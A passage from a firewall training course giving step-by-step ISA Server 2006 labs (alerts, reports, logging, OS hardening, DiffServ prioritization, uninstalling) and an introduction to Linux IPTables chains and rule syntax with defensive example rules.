13. In the Saving Conguration Changes dialog box, click OK.
14. You have now congured ISA Server 2006 alerts to send you an email mes-
sage and log a Windows Event Viewer event whenever a network interface
is disconnected. This could speed up your response time to physical prob-
lems with the ISA Server network segments.
15. Minimize your ISA Server 2006 Management console.
Alerts associated with actions such as sending an email will help you respond to
critical ISA Server events in a timely fashion. Even conguring certain warning
items to send an email alert can help you take proactive steps to ensure the ISA
Server 2006 rewall remains in optimum condition.
256 Tactical Perimeter Defense
TASK 5B-17
Working with Reports
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. You will
congure ISA Server 2006 to create a one-time report and to
create scheduled reports for monitoring baselines and security
performance evaluations.
1. From the Start menu, open Windows Explorer.
2. Create the directory C:\ISA-Reports.
3. Minimize Windows Explorer.
4. Maximize your ISA Server.
5. Expand the Console Tree pane and select the Monitoring container.
6. In the Details pane, select the Reports tab.
7. On the Tasks tab, click the Generate A New Report link.
8. In the New Report Wizard dialog box, in the Report Name eld, type Snap-
shot Report and click Next.
9. In the Report Content dialog box, accept the default of all content choices
and click Next.
10. In the Report Period, leave the default start and stop date and click Next.
11. In the Report Publishing dialog box, check the Publish reports to a direc-
tory check box.
12. In the Report Publishing dialog box, click the Browse button.
13. In the Browse For Folder dialog box, browse to C:\ISA-Reports, select it,
and click OK.
14. In the Report Publishing dialog box, check the Publish Using This Account
check box and then click the Set Account button.
15. In the Set Account dialog box, click the Browse button.
16. In the Select User dialog box, in the Enter The Object Name To Select eld,
type Administrator and then click Check Name. Click OK.
17. In the Password and Conrm Password elds, type the Administrator pass-
word and then click OK. (Your password should be blank.)
Lesson 5: Conguring Firewalls 257
18. In the Report Publishing dialog box, click Next.
19. In the Send E-mail Notication dialog box, leave the defaults blank, and
click Next.
20. In the Completing The New Report Wizard dialog box, click Finish.
21. Restore your minimized Windows Explorer and browse to the C:\ISA-
Reports directory.
22. Open the Snapshot Report [Date Range] folder and double-click the
contents.htm le.
23. Right-click the Allow Blocked Content bar at the top of the browser
screen and choose Allow Blocked Content. Then, click Yes.
24. On the Summary page, click the Protocols link. Scroll through the report
and examine the types of items that are reported.
25. The report contains no signicant data because your ISA Server has not
passed a large number of packets to register monitoring statistics yet.
258 Tactical Perimeter Defense
26. When you nished examining the report, close your Internet Explorer win-
dows and close Windows Explorer.
27. In the Tasks pane, click the Create And Congure Report Jobs link.
28. In the Report Jobs Properties dialog box, click Add.
29. In the New Report Job Wizard dialog box, in the Report Job Name eld,
enter Daily Report and click Next.
30. In the New Report Content dialog box, accept the default all content types
and click Next.
31. In the Report Job Schedule dialog box, select the Daily option and click
Next.
32. In the Reports Publishing dialog box, check the Publish Reports To A
Directory check box.
33. In the Report Publishing dialog box, click the Browse button.
34. In the Browse For Folder dialog box, browse to C:\ISA-Reports, select it,
and then click OK.
35. In the Report Publishing dialog box, check the Publish Using This Account
check box and then click the Set Account button.
36. In the Set Account dialog box, click the Browse button.
37. In the Select User dialog box, in the Enter The Object Name To Select eld,
type Administrator and then click Check Name. Type Administrator (no
password) and click OK.
Lesson 5: Conguring Firewalls 259
38. In the Report Publishing dialog box, click Next.
39. In the Send E-Mail Notication dialog box, leave the defaults blank, and
click Next.
40. In the Completing The New Report Job Wizard dialog box, click Finish.
41. In the Report Jobs Properties dialog box, select the Daily Report option
and click OK.
42. At the top of the Details pane, click the Apply button.
43. In the Saving Conguration Changes dialog box, click OK.
In this task, you successfully congured ISA Server 2006 reporting options. You
examined a snapshot report and created a scheduled reporting job. ISA Server
reports are very comprehensive and can give you an accurate picture of what is
taking place on your ISA Server rewall.
ISA Server 2006 Logging
While alerts give you real-time notication of ISA Server events, logging allows
you to view events in an historical fashion. This can help you analyze the traffic
patterns on your network for such purposes as: policy formulation, intrusion
attempt analysis, network usage analysis, and as an aid in troubleshooting ISA
Server.
260 Tactical Perimeter Defense
Figure 5-21: ISA Server 2006 logging features.
ISA Server divides logging into two logs: the Web Proxy logs, which record ISA
Server traffic handled by Web Proxy Filter; and the Firewall service logs, which
record ISA Server traffic handled by the Microsoft Firewall service.
ISA Server features a variety of log storage options that enable you to the track
traffic that has been handled by ISA Server. The default ISA Server 2006 logging
location is to a local MSDE database on the ISA Server. This database le for the
logs can be found in the C:\Program Files\Microsoft ISA Server\ISALogs folder
and will be named ISALOG_yyyymmdd_xxx_nnn. Where:
yyyy = year
mm = month
dd = date
xxx = Log le type (ISA or WEB)
nnn = order number for sequencing daily logs
Using a database for logging instead of logging to a text le gives ISA Server
powerful reporting capabilities for the log information. ISA Server can redirect
the log le storage location to either a SQL database or to text les. The ability
to use a single SQL database server for multiple ISA servers allows you to cen-
tralize the management, auditing, and backup of the ISA logs. And of course, if
you need the log les to be stored in a .txt le format for any reason, that option
is available. If you choose to store the ISA Server logs on a centralized SQL
server, you need to ensure that ISA Server and the SQL Server have reliable
high-speed Internet connections between them. This precludes ISA from logging
to SQL over a slow WAN link. Microsoft recommends that you have a minimum
of 100 mbps connection speed between ISA and SQL.
It is also worth noting that by default access rules are congured to report pack-
ets for that match that specic rule. If you dont want logging to record actions
for a specic access rule in your rewall policy, then you must disable this option
on the Actions tab of the rule property sheet.
Lesson 5: Conguring Firewalls 261
Figure 5-22: ISA Server 2006 Rule logging options are enabled by default.
TASK 5B-18
Configuring Logging Options
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this task,
you will examine ISA Server 2003 logging options.
1. In ISA Server, expand the Console Tree pane and select the Monitoring
container.
2. On the Details pane, select the Logging tab.
3. On the Tasks tab, click the Edit Filter link.
4. In the Edit Filter dialog box, under the Filter By column, select the Action
lter and then click the Remove button.
5. In the Edit Filter dialog box, from the Filter By drop-down list, select
Protocol.
6. In the Edit Filter dialog box, from the Condition drop-down list, select
Contains.
262 Tactical Perimeter Defense
7. In the Edit Filter dialog click, from the Value drop-down list, select
NetBIOS Name Service and then click the Add To List button.
8. In the Edit Filter dialog box, click the Start Query button.
9. Notice that the Details pane now reports Fetching Results.
10. Open a command prompt and arrange your desktop where you can see
the results section of the Details pane while typing in the command
prompt.
11. In the command prompt, type NET VIEW and then press Enter.
Lesson 5: Conguring Firewalls 263
12. Wait until logging events show in the Details pane and then close the
command prompt.
13. In the Task pane, click the Stop Query link.
14. In the Task pane, click the Congure Firewall Logging link.
15. The Log tab of the Firewall Logging Properties dialog box is where you
would change what log le format ISA Server uses. Examine the available
properties and then click the Fields tab.
16. Examine the list of available logging elds that are available in ISA
Server 2006.
17. Scroll down in the Fields tab and check the Network Interface check
box. Then, click OK.
18. At the top of the Details pane, click the Apply button.
19. In the Saving Conguration Changes dialog box, click OK.
20. In the Task pane, click the Congure Web Proxy Logging link.
21. The Log tab of the Web Proxy Logging Properties dialog is where you
would change what log le format ISA Server uses. Examine the available
properties and then click the Fields tab.
22. Examine the list of available logging elds that are available in ISA
Server 2006.
23. Scroll down in the Fields tab and check the Service check box, and then
click OK.
24. At the top of the Details pane, click the Apply button.
264 Tactical Perimeter Defense
25. In the Saving Conguration Changes dialog box, click OK.
26. Close the ISA Server 2006 Management console.
You have now successfully used ISA logging to review real-time events and also
congured both the Firewall logging and Web Proxy logging to log additional
events. One useful tip to keep in mind is that if you are using database format as
your logging method, you can use Access or other front-end tools to create cus-
tom queries and reports from the ISA Server log databases.
Additional Configuration Options for ISA Server 2006
ISA Server 2006 contains many more conguration options than can be covered
in the scope of this course. There are a few options, however, that are worth tak-
ing your time here to discover and examine. The three options we are going to
discuss are:
Securing the ISA Server OS with the Security Conguration Wizard
ISA Server Packet Prioritization
Uninstalling ISA Server 2006
ISA Server 2006 runs on top of the Windows Server 2003 operating system. In
order for ISA Server to be secure, the underlying OS must also be secured. Win-
dows Server 2003 Service Pack 1 included an attack surface reduction tool called
the Security Conguration Wizard. The Security Conguration Wizard allows you
to select a role for the server OS and then secure it based on the template you
choose. It does this by determining the minimum functionality required in the
OS, and then disables functions that are not required. The default templates
included with the Security Conguration Wizard do not contain a conguration
for ISA Server 2006; however, you can download an update package from the
Microsoft TechNet website that will update the Security Conguration Wizard
with templates for ISA Server 2006. This can greatly simplify the process of
securing the underlying OS for ISA Server.
In order to use the Security Conguration Wizard (or update it), you must rst
install it from the Add/Remove Windows Components control panel applet. Even
if you have already secured the OS before installing ISA Server, the Security
Conguration Wizard can ensure that you have not overlooked anything. Also,
running a scan against the ISA Server OS using MBSA (Microsoft Baseline Secu-
rity Analyzer) or other vulnerability scanning tool will help ensure that ISA
Server is as solid as you can make it.
Lesson 5: Conguring Firewalls 265
TASK 5B-19
Securing ISA Server 2006 with the Security
Configuration Wizard
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. You must also
have access to the Windows Server 2003 source installation
les and the ISA Server 2006 Security Conguration Wizard
update package (IsaScwHlpPack.EXE).
1. Choose StartControl PanelAdd Remove Programs.
2. Click the Add/Remove Windows Components button.
3. In the Add/Remove Windows Components dialog box, scroll down and
check the Security Conguration Wizard check box and then click Next.
4. If required, enter the path to the Windows Server 2003 source les.
5. Click Finish and then close the Add Remove Programs control panel
applet.
6. Double-click the IsaScwHlpPack.exe located in C:\Tools\Lesson5.
7. In the ISA Server Security Conguration Wizard Update dialog box, click
Yes.
8. In the ISA Server Security Conguration Wizard Update dialog box, type
C:\Update for the path and then click OK.
9. To create the C:\Update folder, Click Yes, and then click OK in the suc-
cess dialog box.
10. Choose StartAdministrative ToolsSecurity Conguration Wizard.
11. In the Security Conguration Wizard dialog box, click Next.
12. Select the Create A New Security Policy radio button and click Next.
13. In the Select Sever dialog box, verify the name of your server and then
click Next.
14. In the Processing Security Conguration Database dialog box, click Next.
15. In the Role-Based Service Collection dialog box, click Next.
16. In the Select Server Roles dialog box, de-select all options except
Microsoft Internet Security and Acceleration Server 2004 and click Next.
(ISA 2004 and ISA 2006 have the same OS requirements so the same tem-
plate works for both.)
17. In the Select Client Features dialog box, de-select all options except Auto-
matic Update Client and click Next.
266 Tactical Perimeter Defense
18. In the Select Administration And Other Options dialog box, accept the
defaults and click Next.
19. In the Select Additional Services dialog box, accept the defaults and click
Next.
20. In the Handling Unspecied Services dialog box, select the Disable The
Service option and click Next.
21. In the Conrm Service Changes dialog box, scroll through and review the
changes that will be made and then click Next.
22. In the Network Security dialog box, ensure that the Skip This Section
option is selected and then click Next. (ISA will handle our rewall
requirements. We dont want to create conicts with the built in Windows
Firewall.)
23. In the Registry Settings dialog box, leave the Skip option unselected and
then click Next.
24. In the Require SMB Security Signatures dialog box, check both option
boxes and then click Next.
25. In the Outbound Authentication Methods dialog box, select the Local
Accounts On The Remote Computers option and then click Next.
26. In the Outbound Authentication Methods dialog box, select the Clocks That
Are Synchronized With The Selected Servers Clock option and then
click Next.
27. In the Inbound Authentication Methods dialog box, accept the defaults and
then click Next.
28. In the Registry Settings Summary dialog box, review the changes and then
click Next.
29. In the Audit Policy dialog box, ensure that the Skip option is not selected
and then click Next.
30. In the System Audit Policy section, select the Audit Successful And Unsuc-
cessful Activities radio button and then click Next.
31. In the Audit Policy Summary dialog box, read the summary and then click
Next.
32. In the Save Security Policy dialog box, click Next.
33. In the Security Policy File Name dialog box, append \ISAConguration to
the path and then click Next.
34. In the Apply Security Policy dialog box, select the Apply Now option and
then click Next.
35. In the Completing The Security Conguration Wizard dialog box, click the
Finish button.
Lesson 5: Conguring Firewalls 267
You have successfully used the Security Conguration Wizard to congure the
optimum security conguration settings for the Windows Server 2003 operating
system that ISA Server 2006 is running on top of.
Packet Prioritization
Not all traffic that passes through your ISA Server 2006 rewall will have the
same importance. This can be a real issue for an organization with limited out-
bound bandwidth. For example, a brokerage rm branch office might need to
access up to the second information offered up over by a web service at the main
office. This data would be considered high priority in making fast decisions when
watching trading prices or other important nancial data. Ensuring that requests
to this web service get high priority would be benecial to the brokerage rm.
ISA Server 2006 provides packet prioritization for limited bandwidth scenarios by
implementing the Differentiated Services (DiffServ) protocol. The DiffServ proto-
col provides a framework that enables deployment of scalable service
discrimination over the Internet. DiffServ uses a marker in the IP header of each
packet to assign it a priority level.
It is important to note that this is a global setting and not assigned to a specic
rule. ISA Server packet prioritization is a policy setting for HTTP traffic. It will
apply to all HTTP traffic that traversing your ISA Server. The DiffServ web lter,
built into ISA Server, will scan packets containing a specic set of URLs or for
domain names and assign those packets a priority.
The DiffServ lter has a high priority in ISA Server because it must be aware of
the size of both the request and the response. To gain this awareness, DiffServ
must inspect the HTTP packets at the point where ISA Server sends or receives
the traffic.
ISA Server can only add DiffServ bits to HTTP or HTTPS traffic. It does not ag
any other protocols with a priority level nor does Microsoft guarantee that ISA
Server will transmit DiffServ bits on any other protocol it receives. For packet
prioritization to work, the routers in the traffic transit path must support the QoS
(Quality of Service) functionality.
Once you enable DiffServ on ISA Server, you can then congure the URLs
and/or domains you want to prioritize.
TASK 5B-20
Configuring Packet Prioritization
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. Expand the Console Tree pane, expand Conguration, and select the
General container.
3. In the Details pane, under Global HTTP Policy Settings, select the Specify
DiffServ Preferences.
This wizard only makes
conguration changes. It
does not apply security
patches or updates. You
must also make sure your
OS is kept up-to-date with
the latest patches.
268 Tactical Perimeter Defense
4. In the HTTP DiffServ dialog box, select the Enable Network Traffic
Prioritization According To DiffServ (Quality Of Service) Bits option.
5. Click the Priorities tab and then click Add.
6. In the Add Priority dialog box, in the Priority Name eld, type Branch
Office Priority and then in the DiffServ Bits eld, type 010100 and click
OK. (The DiffServ bits value would correspond to the value set on your
routers.)
7. Click the URLs tab and then click Add.
8. On the Add URL Priority tab, in the URL eld, type brokeragehouse.
securitycertied.net
9. On the Add URL Priority tab, from the Priority drop-down list, select
Branch Office Priority and then click OK.
10. In the HTTP DiffServ dialog box, click the Network tab, select the Exter-
nal network, and then click OK.
11. In the dialog box warning you that DiffServ is currently disabled, click Yes.
12. At the top of the Details pane, click Apply.
13. In the Saving Conguration Changes dialog box, click OK.
14. Close the ISA Server 2006 Management console.
The ISA Server 2006 DiffServ lter is now enabled and congured to prioritize
HTTP packets sent to the URL http://brokeragehouse.securitycertied.net.
Uninstalling ISA Server 2006
Like most Microsoft programs, ISA Server 2006 is relatively easy to uninstall.
The methodology for uninstalling is similar to most programs and is accom-
plished through the Add/Remove Programs control panel applet. One thing to
keep in mind is that in addition to removing ISA Server 2006, you may also need
to change the security conguration of the underlying OS before you can use the
Lesson 5: Conguring Firewalls 269
server for a different purpose. However, as you discovered in an earlier exercise,
the Security Conguration Wizard makes this process relatively painless. Just roll
back the conguration that you used for ISA Server and apply the template that is
appropriate for the servers new role on your network.
TASK 5B-21
Uninstalling ISA Server 2006
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. Choose StartAll ProgramsControl PanelAdd Or Remove
Programs.
2. In the Currently Installed Programs list, select Microsoft ISA Server 2006
and then click Change/Remove.
3. When the Microsoft ISA Server 2006 - Installation Wizard dialog box
appears, click Next.
4. In the Program Maintenance window, select the Remove radio button and
then click Next.
5. In the Generated Files Removal dialog box, accept the defaults, and click
Next.
6. In the Remove The Program dialog box, click Remove.
7. In the Installation Wizard Completed dialog box, click the Finish button.
8. Close the Add Or Remove Programs control panel applet.
9. Choose StartAdministrative ToolsSecurity Conguration Wizard.
10. In the Welcome To The Security Conguration Wizard, click Next.
11. In the Conguration Action dialog box, select the Rollback The Last
Applied Security Policy option and then click Next.
12. In the Select Server dialog box, verify your server name and then click
Next.
13. In the Rollback Security Conguration dialog box, click Next. (If you wish,
you may view the rollback le before clicking Next.)
14. In the Completing The Security Conguration Wizard dialog box, click
Finish.
15. You have successfully removed ISA Server 2006 and the security congura-
tions from your server.
16. Choose StartControl Panel, right-click Network Connections, and
choose Open.
270 Tactical Perimeter Defense
17. Right-click each of the loopback adapters and choose Disable.
18. Close the Network Connections window.
19. If you would like to conrm that these connections are disabled attempt to
ping them in a command prompt. You should not receive a response.
20. Close all open windows.
Topic 5C
IPTables Concepts
One of the primary benets touted for the Open Source model of Linux is its
ability to adapt and change as people come up with bright ideas. This ability has
allowed for security features to be created and modied as industry requirements
and Internet threats evolve. Linux has the capacity to behave as a router, a NAT
server, and a packet-ltering device. All these features are built into the core
operating system.
Firewalling in Linux
Elementary rewalling via an application called ipfwadm was included in earlier
kernel versions. With the development of kernel version 2.2, the rewall was
built with IPChains. From kernel version 2.4 and up, IPChains is replaced with
IPTables. One of the big differences between IPChains and IPTables is that the
latter can be congured to be a stateful packet lter.
At its very essence, the way that IPTables works is extremely simple. The head-
ers within a packet are examined against a known set of rules (also referred to as
a chain), in sequence. If the packet matches a certain rule, a decision is made for
that packet based on what is specied (also referred to as the target). If a match
is not found, then the packet is examined against the next rule in the sequence.
This continues until all the rules are exhausted. At this point, IPTables looks to
the default policy in order to make a decision.
As a packet-ltering rewall, IPTables checks its rules on packets as they enter or
leave an interface. Because IPTables is part of the kernel, the processing of the
packets is very fast. IPTables ability to perform NAT is referred to as
masquerading.
Lesson 5: Conguring Firewalls 271
Essentially, there are three sets of tables that are part of IPTables: Filter, NAT,
and Mangle. Throughout this topic, you will mostly discuss the Filter aspect of
IPTables. NAT tables are used when IP addresses need to be substituted. This
typically happens when you want to hide internal hosts from the Internet. Mangle
tables are used when certain elds in the headers need to be changed, such as the
TTL or TOS elds.
Depending upon the table chosen, you can manipulate certain built-in chains. For
example, built into the Filter table are three rule sets (chains) that cannot be
deleted: Input, Forward, and Output. If youre dealing with the NAT table, you
will have to deal with the Prerouting and Postrouting built-in chains.
If a packet is directed to the rewall, as it enters the computer via an interface,
the Input chain is used to determine the fate of the packet. If a packet originates
at the rewall, the Output chain will be checked. When the packet requires rout-
ing to another location, the Forward chain will be used.
If the packet reaches the end of one of the chains and there has been no match,
whatever default policy exists is used. These default policies exist only on the
default chains, and the options are typically Accept and Drop. You set the default
policy for the built-in chains to one of the above, and in the absence of any other
rule, the action stated by the default policy is carried out. If a match is found in a
rule for a packet, then the appropriate action is carried out. The action to be taken
when a match is found is also referred to as target. The target could be Accept or
Dropor even another chain altogether.
Apart from the built-in chains, a rewall administrator can create user-dened
chains. You identify such chains with a name. Unlike the built-in chains, user-
dened chains do not have a default policy. If a packet reaches the end of a user-
dened chain without any decision made about it, then the packet will return to
the chain that was examining it previously, and start on the next rule in that
chain.
Process of the Packet
As far as the network interfaces on a rewall are concerned, all packets are either
inbound or outbound. Typically, a majority of packets received by an interface in
a rewall are passed on to another interface to be sent onward. At such a time,
the rewall has to decide how the packet is going to be passed on to the other
interface. Packets might be simply routed from one interface to the other (for-
warded), or certain information in the packet headers might have to be stripped,
replaced with new information, and then sent onward, as with NAT (masquerade/
de-masquerade).
The following set of gures (the circle represents a Linux box with three inter-
faces) show the basic movement of packets through a system running IPTables.
First, lets look at inbound ow, in the following gure.
To be able to use IPTables,
the kernel must be compiled
to include support for
rewalling. In this course,
the version of Linux used is
SUSE Enterprise Server 10,
which includes IPTables. If
you are using a different
Linux distribution, you will
need to verify if IPTables has
been installed. If it has not,
you will have to install it.
272 Tactical Perimeter Defense
Figure 5-23: A packets inbound ow.
Figure 5-24: A packets outbound ow.
Lesson 5: Conguring Firewalls 273
Finally, lets look at routing and NAT ow. The following shows packets being
routing, or forwarded.
Figure 5-25: A packets routing (forwarding) or NAT (masquerading/de-masquerading) ow.
Figure 5-26: The multiple decisions that have to be made about a packet by a rewall.
274 Tactical Perimeter Defense
When a packet rst enters an interface, the system veries the checksum value. If
the checksum is correct, the packet moves to the Sanity check. The Sanity check
is a feature that checks for incorrectly formed packets.
After the Sanity check, the packet is moved to the Input chain. It will go through
the chain, and if there is a match at any point, it follows the instructions set forth
for that rule. If there is no match, then the default policy applies. If the packets
destination is the rewall itself, then the Input chain is the only chain processed.
If the packet is destined for another host, the routing processes take over. This is
to determine if the packet is to be forwarded to another machine or to a different
local process. A local process would be one that can send and receive packets.
The routing process looks to the Forward chain. The packet moves down the
rules in the Forward chain, and the system checks for matches. If there is a
match, the matching rule species where the packet should go. If the packet does
not match, then the default policy of the Forward chain takes effect. The Output
chain consists of rules that examine packets generated by the rewall.
The Flow of the Chains
Upon entering an interface, a packet destined for the rewall is processed by the
Input chain. The packet is passed down the list, one rule at a time, until a match
has been found. When there is a match, the packet follows the rule assigned to
the target. The target species what will become of the packet, as far as that rule
is concerned. For example, the target might state that the packet can be accepted,
dropped, or it could be a user-dened chain. A rule in one user-dened chain can
specify another user-dened chain as the target.
Figure 5-27: The Input chain accepting a packet at the third rule.
The target names are straightforwardAccept and Drop. A couple of extensions
to the target are also availableLog and Reject. A small clarication is needed
on the difference between Drop and Reject. As with Microsofts ISA Server, the
end result (as far as the packet is concerned) is that the packet does not get
through. However, by default, when TCP/IP is communicating, there is two-way
Please note that the method
of checking packets against
the built-in chains in
IPTables is very different
from the method employed
by IPChains.
Lesson 5: Conguring Firewalls 275
communication. When the target is set to Drop and a matching packet is found,
that packet is silently dropped. When this happens, technically the function of
TCP has been broken. The TCP standard states that if a connection cannot be
established, an ICMP message is to be returned to the host; this is useful for
troubleshooting purposes. Due to this, the second option of Reject is included.
When the target is set at Reject and a matching packet is found, the packet is still
dropped, but an ICMP message is sent to the host, closing the communication.
The choice is yours to make. Reject might be the nice way to drop a packet, but
from a security standpoint, Drop provides less information. Each rule must be
created with a target, and because rules are numbered and sequential, it is critical
that the correct order be maintained. You do not want an error in the rule order to
mistakenly block a subnet or grant access where it should not be granted. If the
default rules do not provide the level of control that is required, administrators
can create their own chains and apply detailed rules to them.
Figure 5-28: The Input chain nds a match and targets the packet to a user chain.
Conguring chains can quickly become an involved task. For example, the Input
chain receives a packet and nds a match on the fourth rule, sending the packet
to a user chain. That same packet then goes through the user chain, where there
might be a match sending it to a different chain, or even back to the Input chain.
Remember, if a packet does not match any of the rules in a user-dened chain, it
is sent back to the previous chain, where it picks up at the rule that sent it to the
user-dened chain in the rst placesee the following gure.
276 Tactical Perimeter Defense
Figure 5-29: A packet being examined by rst the Input chain, then a user-dened chain,
and going back to the Input chain.
It is possible for an administrator to write rules that will cause the process of
packet examination to loop. If this happens, the packet will be dropped.
Configuration Options
This section covers the conguration options most often used in day-to-day envi-
ronments running IPTables. Not all of the options available in IPTables are
covered here. For a more detailed study of IPTables, you should look around at
the various sources of information available to you. To start with, the man pages
for IPTables are quite extensive and worth reading. For detailed syntax issues that
are not covered here, issuing the man iptables command is a good place to start.
If you do not have a Linux box handy, go to www.iptables.org or
www.netlter.org and read or download articles dealing with setting up a Linux
box as a rewall by using IPTables.
There are conguration options for creating, viewing, and managing chains. The
rst command switch is in uppercase. There are command switches for managing
the individual rules as well, and these also use uppercase. Within the rules, vari-
ous operations are dened by using lowercase.
The iptables Command
The basic syntax of the command is:
iptables command_switch parameters [options]
The following gure shows an example of an IPTables command.
Figure 5-30: Sample command syntax for IPTables.
Lesson 5: Conguring Firewalls 277
Cisco gurus will quickly latch on to the syntax similarities between IPTables and
Cisco Access Control Lists. Basically, youre dealing with some conditions, and if
those conditions are met, then this rule says, Accept the packet. The following
gure shows several examples of usage syntax.
Figure 5-31: Examples of usage syntax for IPTables.
Chain Management
The following table lists some of the command switches for managing the chains.
(Italicized words are variables.)
Figure 5-32: Chain management command switches.
278 Tactical Perimeter Defense
Figure 5-33: Available options for IPTables.
Rule Management
The basic structure for the rule commands is the same as for the chain com-
mands, as shown in the following table.
Figure 5-34: Example rule commands.
The previous command switches are used in managing the rules, and they are in
uppercase. The following table lists commands for creating the actual rules
themselves.
Rule Creation
The previous command switches are used in managing the rules, and they are in
uppercase. The following table lists commands for creating the actual rules
themselves.
Lesson 5: Conguring Firewalls 279
Figure 5-35: Rule creation commands.
Figure 5-36: Conguration options for rules in IPTables.
Other Options
In the rule sets, port numbers are congured as two values, source port, or sport,
and destination port, or dport. For example, if you want a rule to govern source
ports 2100 through 2200, inclusive, you can use the syntax --sport 2100:2200.
Notice that two hyphens are used. Similarly, if you want a rule to address desti-
nation port 31337, you can use the syntax --dport 31337.
Another very useful and important rule conguration tool is the bang (!) entry.
This value, with spaces on either side, negates whatever follows it. Think of a
rule as being divided into a number of elds that more or less correspond to the
headers in a packet. Now, imagine that each of these elds can have certain
specications. Sometimes you might want to negate whats specied (anything
but this). This is where the ! comes in. The ! negates the values specied in that
eld. For example, the syntax to specify any host other than 172.16.23.44 is !
172.16.23.44.
While discussing IP addresses in IPTables, the ability to specify any IP address is
included as well. To do so, you can use 0/0.
When choosing to block ping packets, more specically ICMP packets, be careful
that you are blocking what you mean to block. Because the ICMP protocol is
used for many different parts of communication, it is important that you are
aware of what could happen if you blocked all ICMP traffichost unreachable
280 Tactical Perimeter Defense
messages would not come through, source-quench messages would not come
through, time-exceeded messages would not come through, and so forth. You
need to specify that part of ICMP you want to work with, just as you specify
ports for TCP. The syntax is to use is icmp-type typename, where typename is
one of the following:
Destination-unreachable
Source-quench
Time-exceeded
Parameter-problem
Echo-request
Echo-reply
There are several other switches that can be used; again, check the man pages for
a comprehensive list. One more that is worth mentioning is the -l option. This
option turns on kernel logging of the packets that match the rule. It is possible to
create a rule and use the logging feature, but have no target for the packet. This
is done for tracking purposes, such as to track the number of packets that are for
a particular service on a given host.
To save your IPTables conguration, use the command iptables-save lename to
save the current conguration to the dened le. To restore this conguration, use
the command iptables-restore lename.
Rule Examples
So that the syntax can make a bit more sense, we will look at some rule
examples in their syntax form, and discuss the result of each rule. By the time
you reach the end of this section, you should have a solid grasp of the IPTables
syntax.
Modifying a Default Chain
A simple start to working with the syntax is to modify the behavior of a default
chain. As you remember, there are only three default chains: Input, Output, and
Forward. In this example, we will modify the setting of the default Input chain to
change the default setting to Drop. This is a common modication of the chain,
and is a requirement for a secure system. You do not want to keep the default of
Accept on the Input chain. The syntax to accomplish this is:
iptables -P INPUT DROP
For this chain:
-P sets the default policy of a specied chain.
INPUT is the chain that is getting modied.
DROP is the target.
Therefore, the default policy of the Input chain is now set to Drop all packets. If
this is the only conguration of the Input chain, then all packets trying to reach
the rewall will be dropped! You must create rules where the targets are other
than Drop if you want communications to take place at all.
Lesson 5: Conguring Firewalls 281
The end result of this modication is that when a packet reaches the end of the
Input chain, it will be discarded. Because the default setting of Accept can
present a security risk, changing the setting to Drop is a good idea from a secu-
rity perspective.
Creating a Chain
If you need to create a new chain, the syntax is:
iptables -N chainname
For this chain:
-N indicates that this is a new chain.
chainname is the name of the new chain.
Deleting a Chain
To delete a chain, use the syntax:
iptables -X chainname
For this chain:
-X indicates that you want to delete a chain command.
chainname is the name of the chain that you want to delete.
A chain cannot have any rules in it prior to deletion. If rules exist, you can use
the Flush command.
Flushing a Chain
If you need to delete a chain, and there are still rules in the chain, you can rst
ush the chain. Because ushing removes all rules from a chain, be careful that
you do not perform something unexpected. Plan carefully when deleting chains,
particularly on a production machine. To ush a chain, use the syntax:
iptables -F chainname
For this chain:
-F indicates that you want to ush all rules.
chainname is the name of the chain that you want to ush.
Checking for Connections
If you want to be sure that inbound packets are not trying to establish connec-
tions, you can check the SYN ag. This ag alone would only be set on the
initial part transmission of the three-way handshake. Checking for this ag is a
good way to keep inbound connections from passing through the rule sets, while
leaving the same port open for return communication. To check for connections,
use the syntax:
iptables -A chainname -p TCP -s 10.0.10.10 --syn -j DROP
282 Tactical Perimeter Defense
For this chain:
-A indicates that you want to append a rule to a chain.
chainname is the name of the chain that you want to add the new rule to.
-p indicates that you want to check a protocol.
TCP denes the protocol that you want to check.
-s indicates that you want to check a source address.
10.0.10.10 is the source IP address that you want to check.
--syn indicates that you want to check the SYN ag.
-j indicates that you want to dene a target for matches.
DROP denes the target.
The meaning of this rule is A packet coming from 10.0.10.10 that is trying to
initiate a connection is to be dropped.
Negating Values
Here is an example of syntax that negates a value:
iptables -A OUTPUT -p TCP -d ! 172.16.35.40 --dport 80 -j ACCEPT
For this chain:
-A OUTPUT species that you want to append a rule to the OUTPUT chain.
-p TCP indicates that you want to check the TCP protocol.
-d 172.16.35.40 species the destination that you want to check. However,
because there is a ! before the destination, the rule is stating any destination
other than the specied address.
--dport 80 indicates that you want to check for WWW packets.
-j ACCEPT denes the target as Accept.
In essence, this rule states that all TCP packets can get to the WWW service on
any computerexcept for 172.16.35.40.
The nal example of negating that we will look at also introduces the lo option,
which is used to dene the loopback adapter. Here is the command:
iptables -A INPUT -i ! lo -j DROP
For this chain:
-A INPUT indicates that you want to modify the default INPUT chain by
appending a rule.
-i indicates that you want to check an incoming interface, and lo denes the
incoming interface that you want to check. The ! negates the denition.
-j DROP denes the target as Drop.
In essence, this rule state that all incoming traffic will be deniedexcept for traf-
c on the loopback interface.
Lesson 5: Conguring Firewalls 283
Defining a Target
To dene a target, use the following syntax:
iptables -A INPUT -s 10.0.10.100 -j DROP
For this chain:
-A INPUT indicates that you want to modify the default INPUT chain by
appending a rule.
-s 10.0.10.100 denes the IP address to match.
-j DROP denes the target as Drop.
The meaning of this rule is: All packets that are from the address 10.0.10.100 are
to be denied.
Here is another example of dening a target that also includes a port number:
iptables -A INPUT -p TCP -d 0/0 --dport 12345 -j DROP
The meaning of this rule is: All packets that are destined for any IP address and
to port 12345 are to be denied.
Complex Rules
The different parts of the rules discussed herein can be combined to create overall
rules as needed. Here are some examples of more complex rules:
iptables -A OUTPUT -p TCP -s 10.0.10.0/24 -d 0/0 --dport 80 -j
ACCEPT
This rule for the OUTPUT chain states that any TCP traffic from the 10.0.10.0
network and destined for any IP address on port 80 is to be accepted:
iptables -A INPUT -p TCP -s 0.0.0.0/0 -d 10.0.10.0/24 --dport
31337 -j DROP
This rule for the INPUT chain states that any TCP traffic from any IP address
destined for the 10.0.10.0 network on port 31337 is to be denied:
iptables -A INPUT -p TCP -s 0.0.0.0/0 -d 10.0.10.0/24 --dport
5000:10000 -j DROP
